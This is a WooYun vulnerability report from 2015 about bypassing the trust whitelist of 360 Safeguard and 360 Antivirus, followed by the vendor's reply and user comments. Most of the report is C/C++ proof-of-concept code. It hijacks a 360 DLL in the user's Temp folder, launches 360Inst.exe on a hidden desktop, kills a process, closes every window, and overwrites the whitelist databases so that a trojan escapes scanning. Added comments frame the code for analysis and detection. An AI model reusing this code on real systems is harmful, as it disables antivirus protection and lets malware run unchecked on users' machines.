2015-02-25: 细节已通知厂商并且等待厂商处理中 2015-02-26: 厂商已经确认,细节仅向厂商公开 2015-03-01: 细节向第三方安全合作伙伴开放 2015-04-22: 细节向核心白帽子及相关领域专家公开 2015-05-02: 细节向普通白帽子公开 2015-05-12: 细节向实习白帽子公开 2015-05-27: 细节向公众公开
提升权限将特定目录添加到360安全卫士和杀毒的白名单中。
通过创建虚拟桌面提升自身权限,释放原设定好的白名单数据库文件替换掉现有白名单数据库文件speedmem2.hg和sl2.db,达到添加指定目录为信任目录的结果,致使木马逃避掉360杀毒的扫描。
提升权限部分:
// Proof-of-concept from the disclosure (privilege-elevation stage).
// Two threads cooperate: MainDesk launches 360Inst.exe on a hidden desktop,
// and MainBacak watches the user's "Local Settings\Temp" directory for a
// file named 360net.dll being modified and overwrites it with a local
// "Dll.dll" (the code is reproduced for analysis only).
// Detection angles visible in this listing: a directory-change watch on the
// user Temp folder, a CopyFile onto a 360-named DLL in Temp, a desktop named
// "Virtual" created with DF_ALLOWOTHERACCOUNTHOOK, and 360Inst.exe started
// with a hidden window from a non-360 parent.

// Unused in this listing.
HINSTANCE hInstance = NULL;

// Watcher thread: returns 1 once Dll.dll has been copied over the observed
// 360net.dll, 0 if the copy failed; exits the whole process if the Temp
// directory cannot be opened.  lpParameter is not used.
DWORD WINAPI MainBacak(LPVOID lpParameter)
{
    SetPriorityClass( GetCurrentProcess(), HIGH_PRIORITY_CLASS );
    // %USERPROFILE%\Local Settings\Temp\ -- the directory being watched.
    char MydirPath[MAX_PATH];
    SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0);
    CHAR MyDir[MAX_PATH];
    wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath);
    const int buf_size = 1024;
    CHAR buf[buf_size];
    DWORD dwBufWrittenSize;
    HANDLE hDir;
    // FILE_FLAG_BACKUP_SEMANTICS is required to open a directory handle for
    // ReadDirectoryChangesW.
    hDir = CreateFile(MyDir, FILE_LIST_DIRECTORY,FILE_SHARE_READ|FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS, NULL);
    if (hDir == INVALID_HANDLE_VALUE) {
        CloseHandle(hDir);
        exit(0);
    }
    while(1) {
        // Blocking, recursive (TRUE) watch on every notification class.
        if(ReadDirectoryChangesW(hDir, &buf, buf_size, TRUE ,
                                 FILE_NOTIFY_CHANGE_FILE_NAME| FILE_NOTIFY_CHANGE_DIR_NAME| FILE_NOTIFY_CHANGE_ATTRIBUTES|
                                 FILE_NOTIFY_CHANGE_SIZE| FILE_NOTIFY_CHANGE_LAST_WRITE| FILE_NOTIFY_CHANGE_LAST_ACCESS|
                                 FILE_NOTIFY_CHANGE_CREATION| FILE_NOTIFY_CHANGE_SECURITY,
                                 &dwBufWrittenSize, NULL, NULL)) {
            // Only the first notification record in the buffer is inspected.
            FILE_NOTIFY_INFORMATION * pfiNotifyInfo = (FILE_NOTIFY_INFORMATION*)buf;
            char* pszMultiByte;
            pszMultiByte = new char[512];
            ZeroMemory( pszMultiByte, 512);
            // FileNameLength is in bytes, hence /2 for the WCHAR count.
            WideCharToMultiByte(CP_ACP, 0,pfiNotifyInfo->FileName, pfiNotifyInfo->FileNameLength/2, pszMultiByte, 512, NULL, NULL);
            char *p;
            // Trigger: the notified path contains "360net.dll".
            p=strstr(pszMultiByte,"360net.dll");
            if(p!=NULL) {
                char tmp360net[MAX_PATH]={0};
                lstrcpy(tmp360net,pszMultiByte);
                switch(pfiNotifyInfo->Action) {
                case FILE_ACTION_ADDED:
                    delete []pszMultiByte;
                    break;
                case FILE_ACTION_REMOVED:
                    delete []pszMultiByte;
                    break;
                case FILE_ACTION_MODIFIED:
                    // Overwrite the DLL in Temp with the local Dll.dll
                    // (the file-replacement step the report describes).
                    lstrcat(MyDir,tmp360net);
                    if (CopyFile("Dll.dll",MyDir,FALSE)!=0) {
                        delete []pszMultiByte;
                        CloseHandle(hDir);
                        return 1;
                    } else {
                        delete []pszMultiByte;
                        return 0;
                        break;
                    }
                default:
                    break;
                }
            }
        }
    }
    CloseHandle(hDir);
    return 0;
}

// Launcher thread: creates a desktop named "Virtual" and starts the program
// whose path is passed in lpParameter (360Inst.exe from main) with a hidden
// window on it.  Returns 1 if CreateProcess succeeded, 0 otherwise.
DWORD WINAPI MainDesk(LPVOID lpParameter)
{
    HDESK hDesk = CreateDesktop("Virtual", NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK,
                                DESKTOP_CREATEWINDOW| DESKTOP_ENUMERATE| DESKTOP_READOBJECTS| DESKTOP_WRITEOBJECTS| DESKTOP_HOOKCONTROL ,
                                NULL );
    STARTUPINFO si = {sizeof(si)};
    si.lpDesktop = "Virtual";
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    PROCESS_INFORMATION pi = {0};
    if(!CreateProcess(NULL,(LPSTR)(LPCSTR)lpParameter, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
        CloseDesktop(hDesk);
        return 0;
    }
    return 1;
}

// Entry point: locates 360safe.exe through its App Paths registry entry
// (native key first, then the Wow6432Node mirror), derives
// <Path>\modules\360Inst.exe and, if that file exists, repeatedly runs the
// watcher/launcher thread pair.
int main(int argc, char* argv[])
{
    char safe[MAX_PATH];
    HKEY hkey;
    DWORD type = REG_SZ;
    DWORD buffSize=sizeof(safe);
    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) {
        RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
        RegCloseKey(hkey);
    } else {
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) {
            RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
            RegCloseKey(hkey);
        }
    }
    char tmp360safe[MAX_PATH]={0};
    lstrcpy(tmp360safe,safe);
    lstrcat(tmp360safe,"\\modules\\360Inst.exe");
    char MyDir[MAX_PATH];
    SHGetSpecialFolderPath(NULL,MyDir,CSIDL_PROFILE,0);
    strcat(MyDir,"\\Local Settings\\Temp\\");
    // As published, the process shows the Temp path and terminates here, so
    // the thread loop below is never reached (looks like a debugging leftover).
    MessageBox(NULL,MyDir,NULL,NULL);
    ExitProcess(0);
    if (access(tmp360safe,0)==0) {
        while(1) {
            HANDLE handle[2];
            // Watcher at highest priority, launcher at lowest, so the watch
            // is in place before 360Inst.exe starts.
            handle[1]=CreateThread(NULL,NULL,MainBacak,NULL,CREATE_SUSPENDED,NULL);
            SetThreadPriority(handle[1],THREAD_PRIORITY_HIGHEST);
            ResumeThread(handle[1]);
            handle[2]=CreateThread(NULL,NULL,MainDesk,tmp360safe,CREATE_SUSPENDED,NULL);
            SetThreadPriority(handle[2],THREAD_PRIORITY_LOWEST);
            ResumeThread(handle[2]);
            WaitForSingleObject(handle[2],INFINITE);
            DWORD lpExitCode2;
            GetExitCodeThread(handle[2],&lpExitCode2);
            // Launch failed: retry the whole cycle.
            if (lpExitCode2==0) {
                CloseHandle(handle[2]);
                CloseHandle(handle[1]);
                continue;
            }
            WaitForSingleObject(handle[1],INFINITE);
            DWORD lpExitCode;
            GetExitCodeThread(handle[1],&lpExitCode);
            // Watcher reported a successful copy: pause 15 s before looping.
            if (lpExitCode==1) {
                CloseHandle(handle[1]);
                CloseHandle(handle[2]);
                Sleep(15000);
            } else {
                CloseHandle(handle[1]);
                CloseHandle(handle[2]);
            }
        }
    }
    return 0;
}
替换白名单数据库部分:
// Whitelist-database replacement stage (the payload DLL from the report).
// Detection angles visible in this listing: speedmem2.hg under the 360safe
// "deepscan" folder and sl2.db under the 360sd folder being deleted and
// rewritten by a process other than 360's own, staging files in the user Temp
// folder matching sp?edm?m.hg / s?efmm?.ds, a hidden "taskkill /im load.exe /f",
// and a WM_CLOSE broadcast to every top-level window.

// Returns a pseudo-random value in [0, count) from rand() and the tick count.
// Not cryptographically random; only used to vary the staged file names.
int Storm(int count)
{
    unsigned long Time=GetTickCount();
    int seed=rand()+3;
    seed=(seed*Time)%count;
    return seed;
}

// EnumWindows callback: posts WM_CLOSE to every top-level window.
BOOL CALLBACK EnumWindowsProc(HWND hwnd,LPARAM IParam)
{
    PostMessage(hwnd, WM_CLOSE, 0, 0);
    return TRUE;
}

// Exported with an unmangled name; presumably the symbol the host process
// resolves from the planted DLL (not shown here -- verify against the
// loader).  Locates the 360safe.exe and 360sd.exe install paths via their
// App Paths registry entries, writes two prepared database files to Temp
// under randomised names, then replaces the installed speedmem2.hg and sl2.db
// with them.
extern "C" __declspec(dllexport)void HttpCreateDownloadObj()
{
    char taskkill[MAX_PATH];
    wsprintf(taskkill,"taskkill /im load.exe /f");
    WinExec(taskkill,SW_HIDE);
    EnumWindows(EnumWindowsProc,0);
    char safe[MAX_PATH];
    char SD[MAX_PATH];
    HKEY hkey;
    DWORD type = REG_SZ;
    DWORD buffSize=sizeof(safe);
    DWORD buffSize1=sizeof(SD);
    // 360safe.exe install path: native key first, then the Wow6432Node mirror.
    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) {
        RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
        RegCloseKey(hkey);
    } else {
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) {
            RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
            RegCloseKey(hkey);
        }
    }
    // 360sd.exe (antivirus) install path, same lookup order.
    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) {
        RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1);
        RegCloseKey(hkey);
    } else {
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) {
            RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1);
            RegCloseKey(hkey);
        }
    }
    // Built but not used further in this listing.
    char tmp360safe[MAX_PATH]={0};
    lstrcpy(tmp360safe,safe);
    lstrcat(tmp360safe,"\\modules\\360Inst.exe");
    // Staging directory: %USERPROFILE%\Local Settings\Temp\
    char MydirPath[MAX_PATH];
    SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0);
    CHAR MyDir[MAX_PATH];
    wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath);
    // Staged copies get two random lowercase letters in fixed positions.
    CHAR speedmem[MAX_PATH];
    wsprintf(speedmem,"%s\\sp%cedm%cm.hg",MyDir,'a'+Storm(26),'a'+Storm(26));
    CHAR slD[MAX_PATH];
    wsprintf(slD,"%s\\s%cefmm%c.ds",MyDir,'a'+Storm(26),'a'+Storm(26));
    // Not shown on this page: per the report these write out the pre-built
    // whitelist databases for 360 Antivirus and 360 Safeguard respectively.
    speedmemSaveFile(speedmem);
    sdSaveFile(slD);
    // Targets: <360safe Path>\deepscan\speedmem2.hg and <360sd Path>\sl2.db.
    CHAR Newspeedmem[MAX_PATH];
    wsprintf(Newspeedmem,"%s\\deepscan\\speedmem2.hg",safe);
    CHAR NewslD[MAX_PATH];
    wsprintf(NewslD,"%s\\sl2.db",SD);
    // Delete-then-copy replacement; return values are not checked.
    DeleteFile(Newspeedmem);
    DeleteFile(NewslD);
    CopyFile(speedmem,Newspeedmem,FALSE);
    CopyFile(slD,NewslD,FALSE);
    // Remove the staged copies from Temp.
    DeleteFile(speedmem);
    DeleteFile(slD);
    return;
}
speedmemSaveFile与sdSaveFile分别是生成了之前在360杀毒和360安全卫士下设定好路径的白名单数据库文件。
你们自然晓得怎么修复啦:P
危害等级:中
漏洞Rank:10
确认时间:2015-02-26 10:17
感谢乌云白帽子的报告。此问题是通过360安全卫士中一处防御缺陷突破信任机制实现的白名单篡改。我们在一个月以前就已经从其它渠道获知了该漏洞并进行了修复和升级,目前外网的最新版360都不存在此问题。
暂无
前排。
看热闹来了
想法挺有趣
我就看热闹……
@疯狗 狗哥求审核漏洞哇~http://www.wooyun.org/bugs/wooyun-2015-098220/trace/d3696fac6fedfc73e5b9cb3414e41f22 http://www.wooyun.org/bugs/wooyun-2015-098218/trace/7ede802f3e44c53f6bd9c619d4cdfb58 http://www.wooyun.org/bugs/wooyun-2015-098216/trace/8622604ba8dbab65162a1716ffd597d6 http://www.wooyun.org/bugs/wooyun-2015-098214/trace/d5f7b1cdff61c342ea8180df5ab97902 http://www.wooyun.org/bugs/wooyun-2015-098213/trace/7afe8ec3e38a4f0ca605bbe66410cab9 http://www.wooyun.org/bugs/wooyun-2015-098182/trace/f63e50138f738b4520247685231d625b http://www.wooyun.org/bugs/wooyun-2015-098181/trace/3e84e04ccad83703fa88cc5da607d53a http://www.wooyun.org/bugs/wooyun-2015-098086/trace/bbba155e0342206751099e13e46988a2 http://www.wooyun.org/bugs/wooyun-2015-098085/trace/a7013d64e1e464e91f768c93532ce809 http://www.wooyun.org/bugs/wooyun-2015-098080/trace/e201246320266c46147badb5ae8cd253 http://www.wooyun.org/bugs/wooyun-2015-097988/trace/fc118e708b58889b3eb32f22364952d7 http://www.wooyun.org/bugs/wooyun-2015-097890/trace/df69ebc6823c8cc505a360c92fb8aa16 http://www.wooyun.org/bugs/wooyun-2015-097754/trace/5cc4b0424a2adacabb6b34d50ef910af http://www.wooyun.org/bugs/wooyun-2015-095786/trace/0a7e573a6b7cb12b7421ec5a745456ae http://www.wooyun.org/bugs/wooyun-2015-094879/trace/63d9f708ea64bbe409f578cc0f769aa5
能不能把360加到黑名单……
还以为把360提权了呢
360的白名单目录你找得到吗?
@浅蓝 哥 你命真苦 都没审核通过